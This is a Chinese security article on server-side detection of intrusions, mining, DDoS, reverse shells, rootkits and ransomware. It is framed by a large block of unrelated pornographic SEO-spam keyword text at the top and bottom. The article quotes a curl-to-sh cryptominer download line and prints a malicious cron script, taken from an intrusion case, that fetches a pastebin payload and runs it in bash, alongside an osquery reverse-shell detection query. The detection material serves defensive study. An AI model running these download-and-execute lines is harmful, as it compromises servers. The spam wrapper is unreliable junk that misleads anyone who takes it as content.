精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

態勢感知——服務器安全策略探索

運維 服務器運維
企業IT架構數字化轉型的大潮中,往往會面臨各種各樣的安全威脅,包括:系統和應用軟件漏洞利用攻擊,APT攻擊,數據泄露,云服務器濫用,DDoS攻擊等。同時為了應對速度越來越快的網絡犯罪攻擊,以及針對性攻擊的多態化。為我們安全人員提出了更高的要求。

 0x00、業務需求

企業IT架構數字化轉型的大潮中,往往會面臨各種各樣的安全威脅,包括:系統和應用軟件漏洞利用攻擊,APT攻擊,數據泄露,云服務器濫用,DDoS攻擊等。同時為了應對速度越來越快的網絡犯罪攻擊,以及針對性攻擊的多態化。為我們安全人員提出了更高的要求。

在做應急響應安全事件過程的過程中,確認攻擊痕跡一般從以下幾個方面:

0x01、服務器安全告警

在態勢感知產品中,在服務器上部署EDR終端是一個很好的服務器安全量化的一個過程。因為我們在服務器上可以收集進程、端口、賬號、軟件以及文件目錄基礎的安全數據。通過這些基礎數據通過后臺大數據分析加工形成我們感知到威脅。

本篇主要從服務器端做檢測,服務器端檢測有以下優勢:

  • 單純的網絡層威脅檢測無法和終端數據聯動,形成的證據鏈可信度低。
  • 加密連接,通過SSL的bash反連等,無法通過網絡檢測,需要深度學習檢測,檢測成本過高。
  • threat hunting需求,可以更深入調查,包括獲取惡意程序。

那么我們先從入侵行為分析開始:

  • 失陷主機

檢測思路:需要收集服務器端基礎數據: 實時網絡連接數據,同時需要商業威脅情報數據源。

實時網絡連接數據,實驗環境搭建:通過kolide+osquery+ElasticSearch+kibana。

實現步驟:

1、從服務器端獲取基礎外聯網絡數據。

2、通過flink或者spark streaming做實時Top進程、Top外聯IP統計,分析所有服務器上傳的外聯孤島數據,也可以編輯規則重點監控下載應用程序,或者下載對端的應用如果是HFS服務。需要重點關注。當然這里可以玩的playbook很多,需要用戶自己挖掘。

3、從中獲取到應有程序路徑、對外連接IP信息,以及端口。通過IP地址查詢威脅情報,如果對端IP地址使用的C2、Tor、VPN、SS等地址視為失陷主機。態勢感知——服務器安全策略探索

  • 對外可疑連接

檢測思路:這里主要是增加內容特征,比如說:上傳設備基本信息、發送攻擊指令、獲取公網IP地址、黑客攻擊連接等。服務器端需要把惡意程序上傳云查殺或者云沙箱做深入檢測。

實驗環境:Malice(支持Yara+多殺毒引擎集成+virustotal)+ClamAV +ElasticSearch+kibana。

IDS檢測規則完善:

當然需要一個安全Team維護這個規則。

檢測流程:

1、通過IDS檢測到對外連接。

2、通過網絡通訊進程關聯到文件。

3、上傳文件到云查殺系統中檢測。如果發現病毒告警。

  • 對外DDoS

檢測思路:通過獲取實時進程快照,網絡對外連接快照,網絡層獲取其流量信息,同時也上傳對應的進程文件到云查殺和云沙箱檢測。在網絡層檢測通過IDS規則檢測到對外DDoS攻擊最多為:NTP反射攻擊、memcache反射攻擊。但是在服務器端檢測會發現更多攻擊方式,例如:CC攻擊、SIP協議攻擊、視頻協議攻擊、SYN Flood、ACK Flood等。當然需要客戶端抓包進一步確認。

檢測流程:

1、獲取進程快照,網絡對外連接快照,對外連接網絡流量(需要驅動支持)或者獲取總流量。

2、執行抓包程序,采集服務器端Pcap包,上傳Pcap包樣本到服務器端。

3、通過各種DDoS攻擊規則過濾,如果發現預定的攻擊類型。

  • 挖礦檢測

檢測思路:特征是CPU占用率過高。通過上傳進程快照,同時獲取類似top命令CPU占用率信息。可以確定挖礦進程。當然還有 /bin/sh -c /usr/bin/curl -sL https://xmr.tgywl.cn|sh 直接挖礦。

檢測流程:

1、獲取進程快照,CPU占用率信息。

2、多次CPU占率過高的進程聚合。

3、上傳文件到云查殺系統中檢測。如果發現病毒告警。

4、復查各個端口被入侵的痕跡,如果產生以下攻擊告警,需要大數據關聯分析(flink or spark streaming)。

  • 對外爆破

檢測思路:關聯網絡層檢測和服務器端檢測相關進程。

檢測流程:

1、獲取進程快照,對外網絡連接快照。

2、獲取網絡層面各種協議的暴力破解告警。

3、使用flink or spark streaming 做大數據關聯分析。

  • 蠕蟲病毒

檢測思路:如果存在對外掃描功能,通過大數據分析網絡連接,短時間內過多連接視為可疑。

檢測流程:

1、獲取進程快照,對外網絡連接快照。

2、獲取網絡層面對外可疑連接告警。

3、上傳文件到云查殺系統中檢測。進一步分析,發現病毒標記為蠕蟲病毒告警。

  • 反彈shell

檢測思路:sh或者bash運行打開遠程連接,視為反彈shell。

檢測流程:

1、獲取進程快照,對外網絡連接快照。

2、查詢語句。

  1. "behavioral_reverse_shell": { 
  2.       "query" : "SELECT DISTINCT(processes.pid), processes.parent, processes.name, processes.path, processes.cmdline, processes.cwd, processes.root, processes.uid, processes.gid, processes.start_time, process_open_sockets.remote_address, process_open_sockets.remote_port, (SELECT cmdline FROM processes AS parent_cmdline WHERE pid=processes.parent) AS parent_cmdline FROM processes JOIN process_open_sockets USING (pid) LEFT OUTER JOIN process_open_files ON processes.pid = process_open_files.pid WHERE (name='sh' OR name='bash') AND remote_address NOT IN ('0.0.0.0', '::', '') AND remote_address NOT LIKE '10.%' AND remote_address NOT LIKE '192.168.%';"
  3.       "interval" : 600, 
  4.       "description" : "Find shell processes that have open sockets" 
  5.     }, 
  • rootkit檢測

我們先看一個入侵案例,以下腳本是用戶放到定時任務中的經過base64加密的腳本,通過替換curl、wget實現進程網絡通訊隱藏的目的。

  1. import os 
  2. import os.path 
  3.  
  4. def GetDeps(): 
  5.  
  6.    if os.path.isfile('/usr/bin/url'): 
  7.         os.system("mv /usr/bin/url /usr/bin/curl"
  8.         os.system("chmod 777 /usr/bin/curl"
  9.         os.system("chmod +x /usr/bin/curl"
  10.  
  11.     if os.path.isfile('/usr/bin/get'): 
  12.         os.system("mv /usr/bin/get /usr/bin/wget"
  13.         os.system("chmod 777 /usr/bin/wget"
  14.         os.system("chmod +x /usr/bin/wget"
  15.  
  16.     if not os.path.isfile('/usr/bin/wget'): 
  17.         os.system("yum clean all"
  18.         os.system("yum -y install wget"
  19.         os.system("apt-get update"
  20.         os.system("apt-get -y install wget"
  21.  
  22.     if not os.path.isfile('/usr/bin/curl'): 
  23.         os.system("yum clean all"
  24.         os.system("yum -y install curl"
  25.         os.system("apt-get update"
  26.         os.system("apt-get -y install wget"
  27.  
  28. if os.getuid()==0: 
  29.     GetDeps() 
  30. os.system("(curl -fsSL https://pastebin.com/raw/JuBCmASZ||wget -q -O- https://pastebin.com/raw/JuBCmASZ)|bash%7Cbash)"

由于存在我們安裝的服務器以前中過rootkit程序的情況。

檢測流程

1、需要從遠程下載wget\curl\ps\ls\netstat\ss等網絡和文件檢測工具

2、與本地對應的文件做對比檢測找到diff。

3、如果存在Diff,證明存在rootkit的惡意行為,告警。

  • 勒索軟件

檢測思路:

1、上傳文件創建基礎數據信息、上傳進程快照信息。

2、統計平時文件創建數據,設置動態基礎數據基線。

3、如果單臺服務器創建量超出平時2倍以上,需要把對應的文件上傳到云查殺分析,如果發現勒索軟件病毒標簽告警。

0x03、總結

服務器安全檢測是一項非常繁瑣,并且特殊情況比較多的工作,需要這些檢測規則和手段自動化成威脅模型。同時,人工threat huning結果也要不斷加入,形成正向反饋,良性循環。

責任編輯:武曉燕 來源: 4hou
相關推薦

2011-03-08 15:16:02

2010-08-02 23:34:08

NFS服務器

2013-05-03 14:25:32

2022-03-19 00:09:59

態勢感知網絡安全

2009-12-04 10:24:25

2010-09-29 13:38:23

NFS服務器

2018-11-26 08:12:54

2014-04-21 10:24:06

2009-07-11 18:54:05

2022-01-16 06:57:12

安全態勢網絡安全IT安全

2017-04-25 06:34:30

2010-03-10 11:31:31

2015-09-02 10:21:55

2020-02-02 09:23:44

軟件安全滲透測試信息安全

2022-01-14 14:56:17

網絡安全信息安全技術

2020-02-27 16:23:19

網絡安全態勢

2020-02-21 10:44:21

網絡安全態勢感知漏洞分析

2022-03-24 08:02:39

網絡安全端點

2011-03-23 10:58:52

2013-02-20 10:33:28

Windows安全策略
點贊
收藏

51CTO技術棧公眾號

亚洲男人电影天堂| 久久av老司机精品网站导航| 亚洲老头老太hd| 91蝌蚪视频在线观看| 美女免费久久| av高清久久久| 国产中文字幕91| 久久免费少妇高潮99精品| 免费视频一区三区| 欧美一区二区在线看| 日韩av黄色网址| av在线free| 久久精品亚洲精品国产欧美| 国产欧美一区二区三区在线看| 精品一区二区三区人妻| 日韩一区三区| 日韩精品极品视频免费观看| 五月六月丁香婷婷| 亚洲精品.com| 亚洲成人在线网站| 男女啪啪的视频| 国产一二三区在线| av亚洲精华国产精华精| 成人精品久久av网站| 一级成人黄色片| 亚洲午夜在线| 久久av在线看| 很污很黄的网站| 欧美欧美黄在线二区| 精品成人佐山爱一区二区| 午夜精品久久久久久久99热影院| 两个人看的在线视频www| 亚洲综合男人的天堂| 亚洲欧美国产精品桃花| 国产经典自拍视频在线观看| 不卡一区二区中文字幕| 91精品国产综合久久久久久丝袜 | 亚洲精品色图| 欧美日韩第一视频| 五月婷婷一区二区| 久久精品久久久| 日韩中文有码在线视频| 99久久精品免费视频| 亚洲瘦老头同性70tv| 亚洲福利视频在线| 小毛片在线观看| 91精品啪在线观看国产手机| 欧美大胆人体bbbb| 日本黄色一级网站| 日本一区二区三区播放| 8v天堂国产在线一区二区| 欧美美女性视频| 色999久久久精品人人澡69| 欧美性极品少妇| 免费看污污网站| 欧洲亚洲精品久久久久| 欧美日韩亚洲另类| www.午夜av| 日韩精品三级| 亚洲成人av在线| 一级特黄a大片免费| 婷婷激情久久| 一区二区在线视频| 日韩欧美在线视频播放| 久久久久亚洲| 欧美黑人性视频| www.av麻豆| 天堂一区二区在线免费观看| 国产成人免费av电影| 免费黄色小视频在线观看| 秋霞影院一区二区| 96sao精品视频在线观看| av网站在线观看免费| 成人网在线播放| 欧美精品一区二区三区在线四季| 久草福利在线| 中文字幕一区二区三| 久久av高潮av| 依依综合在线| 欧美日韩国产综合视频在线观看 | 国产美女激情视频| 视频一区二区三区在线| 国产免费一区视频观看免费| www视频在线| 久久久精品欧美丰满| 一区二区三区四区视频在线观看| 色黄网站在线观看| 色哟哟一区二区在线观看| 不卡的av中文字幕| gogo久久日韩裸体艺术| 亚洲人成电影在线| 日韩一级片av| 久久久精品性| av观看久久| 国产女主播在线写真| 一区二区在线电影| 欧美精品成人网| 日本一区二区三区电影免费观看 | 黄色大片在线播放| 欧美视频在线观看 亚洲欧| 一级做a免费视频| 欧美日韩破处| 久久在线视频在线| 免费又黄又爽又猛大片午夜| 国产美女娇喘av呻吟久久| 欧美精品久久久| 97超碰资源站在线观看| 在线观看亚洲a| 欧美大喷水吹潮合集在线观看| 久久人人88| 欧美一级电影久久| 亚洲国产精品久久人人爱潘金莲 | av动漫一区二区| 香蕉精品视频在线| 高潮一区二区| 亚洲丁香婷深爱综合| 婷婷丁香综合网| 久久福利影视| 好吊色欧美一区二区三区视频| 巨大荫蒂视频欧美另类大| 一本久道久久综合中文字幕| 亚洲啪av永久无码精品放毛片| 99久久久久| 国产精品久久久久久久7电影| 日韩中文字幕免费观看| 亚洲免费观看高清| 日本人69视频| 欧美xxav| 国产欧美va欧美va香蕉在| 狠狠色伊人亚洲综合网站l | 一级特黄色大片| 国产亚洲视频系列| aa免费在线观看| 美女午夜精品| 国内精品久久久| 亚洲精品一区二区三区不卡| 亚洲欧美日韩综合aⅴ视频| 九九九在线观看视频| 国产精品欧美日韩一区| 欧美一区二区.| 日韩大胆人体| 欧美性jizz18性欧美| 熟女人妻在线视频| 国产视频一区欧美| 欧美连裤袜在线视频| xx欧美视频| 亚洲天堂成人在线视频| 日韩免费av网站| 国产日产精品1区| 国产日产欧美视频| 国产一区国产二区国产三区| 国产97在线观看| 国产精品毛片一区二区三区四区| 日本高清视频一区二区| 自拍偷拍你懂的| 久久国产成人午夜av影院| 亚洲一区三区电影在线观看| 日日夜夜亚洲精品| 久久91精品国产| 国精产品一品二品国精品69xx | 久艹视频在线免费观看| 免费成人三级| 热门国产精品亚洲第一区在线| 艳母动漫在线看| 色婷婷激情久久| 超碰人人干人人| 国产一区视频导航| 污污污污污污www网站免费| 国产精东传媒成人av电影| 欧美一级视频一区二区| caoporn国产精品免费视频| 欧美日韩高清一区二区不卡| 欧美人与禽zozzo禽性配| www.av亚洲| the porn av| 伊人色**天天综合婷婷| 国产精品麻豆免费版| 欧美性suv| www.国产精品一二区| 狠狠综合久久av一区二区| 都市激情亚洲色图| 亚洲一区电影在线观看| 成人午夜视频在线观看| 精品少妇无遮挡毛片| 亚洲情侣在线| 精品综合久久| 外国成人毛片| 91精品国产99久久久久久| 91伦理视频在线观看| 精品国产91乱码一区二区三区| 区一区二在线观看| 亚洲免费视频中文字幕| 中文字幕一区二区人妻在线不卡| 精品一区二区三区日韩| 国产97在线 | 亚洲| 日韩免费久久| 久久99国产精品99久久| 99re8精品视频在线观看| 91国在线精品国内播放| 国产午夜精品久久久久免费视| 亚洲第一在线视频| 国产又黄又大又粗的视频| 精品久久久久久久久中文字幕| av黄色免费在线观看| 99久久精品国产一区| 欧美特黄aaa| 日韩精品成人一区二区三区| 欧美交换配乱吟粗大25p| 成人三级视频| 免费久久99精品国产自| 国产精品99久久免费观看| 国产又爽又黄的激情精品视频| japanese色国产在线看视频| 日韩视频在线观看免费| 国产黄色在线播放| 亚洲精品久久久久中文字幕欢迎你 | 1024在线看片| 久久亚洲二区三区| 亚洲精品国产成人av在线| 国内久久精品视频| 亚洲一区二区三区四区五区xx| 亚洲精品麻豆| www.好吊操| 波多野结衣的一区二区三区| 久久国产精品-国产精品| 亚洲一区网址| 97欧洲一区二区精品免费| 精品无人乱码一区二区三区| 国内精品模特av私拍在线观看| av软件在线观看| 久久影院中文字幕| av中文字幕在线观看| 久久人人爽人人爽爽久久| 日本在线免费看| 这里只有精品视频在线| www.亚洲视频| 在线观看国产精品日韩av| 国产在线高清| 国产亚洲成精品久久| 九色视频成人自拍| 亚洲人成自拍网站| 国产毛片在线看| 亚洲天堂免费在线| 国产一二在线观看| 深夜福利91大全| 日本在线观看视频| 日韩视频在线观看免费| caoporn免费在线视频| 久久综合久久八八| 色爱综合区网| 68精品国产免费久久久久久婷婷| 漫画在线观看av| 青青久久av北条麻妃黑人| 欧美大片免费| 国产精品日韩欧美| 亚洲成人高清| 91在线免费看片| 动漫av一区| 玛丽玛丽电影原版免费观看1977 | 成人性免费视频| 国产精品久久国产愉拍| 日本中文字幕片| 另类欧美日韩国产在线| 超碰在线超碰在线| 99久久精品免费看国产免费软件| 久久久久久久久久久国产精品| 国产亚洲精品bt天堂精选| 91动漫免费网站| 一区二区成人在线视频| 日本中文字幕免费观看| 欧美午夜xxx| 一级全黄少妇性色生活片| 日韩限制级电影在线观看| 午夜精品久久久久久久99| 亚洲激情视频在线播放| 国产在线一二三| 久久综合色影院| 久久男人天堂| 国产日本欧美在线观看| avtt综合网| 亚洲看片网站| 影音国产精品| 亚洲污视频在线观看| 成人一区在线观看| 欧美性受xxxx黑人| 亚洲精品成人悠悠色影视| 草久视频在线观看| 6080国产精品一区二区| 无码精品在线观看| 精品精品国产国产自在线| 波多野结衣精品| 国产精品一久久香蕉国产线看观看| 一区二区视频| 亚洲精品久久久久久一区二区| 黄色亚洲免费| 亚洲黄色小视频在线观看| av在线综合网| 蜜臀av午夜精品久久| 日韩欧美在线免费观看| 国产不卡精品视频| 一区二区欧美激情| gogo高清在线播放免费| 国产日韩亚洲欧美| 妖精视频一区二区三区免费观看| 中文精品视频一区二区在线观看| 国产日本精品| 在线成人免费av| 国产人伦精品一区二区| 免费在线不卡视频| 日韩欧美成人激情| av网站在线免费播放| 91地址最新发布| 白白在线精品| 300部国产真实乱| 蜜臀国产一区二区三区在线播放| 日本少妇毛茸茸| 亚洲综合男人的天堂| 国产免费无遮挡| 少妇久久久久久| 99久久婷婷国产综合精品首页| 国产在线一区二区三区四区| 女人天堂亚洲aⅴ在线观看| 色播五月综合网| 国产亚洲女人久久久久毛片| 日本一二三区视频| 精品国产第一区二区三区观看体验 | aaa亚洲精品| 豆国产97在线 | 亚洲| 日韩视频中午一区| 4438x成人网全国最大| 国产中文日韩欧美| 国产精品久久久久9999赢消| 日本人视频jizz页码69| 欧美高清在线一区| 一级一级黄色片| 这里只有精品视频在线| 日韩一区二区三区在线免费观看 | 亚洲国产国产亚洲一二三 | 欧美极品少妇xxxxⅹ高跟鞋 | 日本怡春院一区二区| 韩国三级hd中文字幕| 色婷婷综合激情| 国产女主播在线写真| 国产狼人综合免费视频| 999久久久精品国产| 伊人免费视频二| 亚洲综合成人网| 香港三日本三级少妇66| 日本成人黄色片| 欧美中文一区二区| 午夜一区二区视频| 玉米视频成人免费看| 亚洲精品无amm毛片| 欧美性受xxxx黑人猛交| 欧美美女在线| 欧美一级视频在线| 亚洲精品v日韩精品| 视频一区 中文字幕| 日韩美女在线观看| 成人一区二区| 精品人妻一区二区三区免费| 亚洲一区二区美女| 日韩欧美在线番号| 国产成人自拍视频在线观看| 99re66热这里只有精品8| 亚洲欧美日韩网站| 欧美日韩国产中字| av网站无病毒在线| av免费观看久久| 亚洲欧美日韩国产一区二区| 国产91丝袜美女在线播放| 91精选在线观看| 9999精品成人免费毛片在线看 | 欧美亚洲精品一区| 中文字幕伦理免费在线视频| 国产伦精品一区二区三区免| 首页欧美精品中文字幕| 最新黄色av网址| 日韩国产一区三区| 亚洲精品一区二区在线播放∴| 97超碰在线人人| 国产精品免费久久久久| 免费av一级片| 国产精品一区二区久久久| 亚洲国产清纯| 久草手机视频在线观看| 亚洲国产精品推荐| 亚洲成人a级片| 男人揉女人奶房视频60分| 最新久久zyz资源站| 色欲av伊人久久大香线蕉影院| 国产精品欧美激情| 亚洲精选一区| www.毛片com| 亚洲午夜色婷婷在线| 成人av资源网址| 99re精彩视频| 欧美性猛交xxxx黑人猛交| 1区2区在线观看| 亚洲一区3d动漫同人无遮挡|